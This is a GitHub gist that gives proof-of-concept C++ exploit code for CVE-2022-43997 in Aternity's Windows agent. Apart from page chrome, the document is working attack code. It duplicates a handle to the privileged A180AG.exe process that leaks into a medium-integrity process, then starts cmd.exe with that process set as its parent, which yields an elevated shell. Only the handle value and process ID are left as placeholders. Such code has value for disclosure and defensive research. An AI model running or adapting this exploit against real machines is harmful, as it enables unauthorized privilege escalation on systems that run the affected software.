Created
January 23, 2023 21:51
-
-
Save jackullrich/21fcfe75aeb5e18c60b80e684b83d741 to your computer and use it in GitHub Desktop.
CVE-2022-43997
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <memory> | |
| #include <Windows.h> | |
| bool CreateProcessWithParent(HANDLE hProcess, PWSTR commandline) | |
| { | |
| SIZE_T size = 0; | |
| bool result = false; | |
| STARTUPINFOEX si = { sizeof(si) }; | |
| PROCESS_INFORMATION pi = { 0 }; | |
| if (InitializeProcThreadAttributeList(nullptr, 1, 0, &size)) | |
| { | |
| auto buffer = std::make_unique<BYTE[]>(size); | |
| if (buffer != nullptr) | |
| { | |
| auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get()); | |
| if (InitializeProcThreadAttributeList(attributes, 1, 0, &size)) | |
| { | |
| if (UpdateProcThreadAttribute(attributes, 0, | |
| PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, | |
| &hProcess, sizeof(hProcess), nullptr, nullptr)) | |
| { | |
| si.lpAttributeList = attributes; | |
| result = CreateProcessW(nullptr, commandline, nullptr, nullptr, | |
| FALSE, EXTENDED_STARTUPINFO_PRESENT, nullptr, nullptr, | |
| (STARTUPINFO*)&si, &pi); | |
| if (result) | |
| { | |
| CloseHandle(pi.hProcess); | |
| CloseHandle(pi.hThread); | |
| } | |
| CloseHandle(hProcess); | |
| DeleteProcThreadAttributeList(attributes); | |
| } | |
| } | |
| } | |
| } | |
| return result; | |
| } | |
| bool DuplicateAternityHandle(HANDLE hHandleValue, DWORD dwProcessId, PHANDLE hClonedHandle) | |
| { | |
| bool result = false; | |
| HANDLE hLocalClone = INVALID_HANDLE_VALUE; | |
| HANDLE hOwnerProcess = INVALID_HANDLE_VALUE; | |
| hOwnerProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId); | |
| if (hOwnerProcess != nullptr) | |
| { | |
| if (DuplicateHandle(hOwnerProcess, hHandleValue, GetCurrentProcess(), &hLocalClone, 0, FALSE, DUPLICATE_SAME_ACCESS)) | |
| { | |
| result = true; | |
| } | |
| CloseHandle(hOwnerProcess); | |
| } | |
| *hClonedHandle = hLocalClone; | |
| return result; | |
| } | |
| int main(void) | |
| { | |
| // | |
| // <!--- Replace these values (handle, dwProcessId) ---> | |
| // These can be obtained by calling NtQuerySystemInformation as well | |
| // | |
| // This is the A180AG.exe handle value from the medium IL process | |
| // | |
| HANDLE handle = INVALID_HANDLE_VALUE; | |
| // | |
| // This is the process id of the medium IL process | |
| // | |
| DWORD dwProcessId = 123456; | |
| // Application we want to start | |
| wchar_t commandLine[1024] = L"C:\\Windows\\System32\\cmd.exe"; | |
| HANDLE hClonedHandle = INVALID_HANDLE_VALUE; | |
| if (DuplicateAternityHandle(handle, dwProcessId, &hClonedHandle)) | |
| { | |
| CreateProcessWithParent(hClonedHandle, commandLine); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment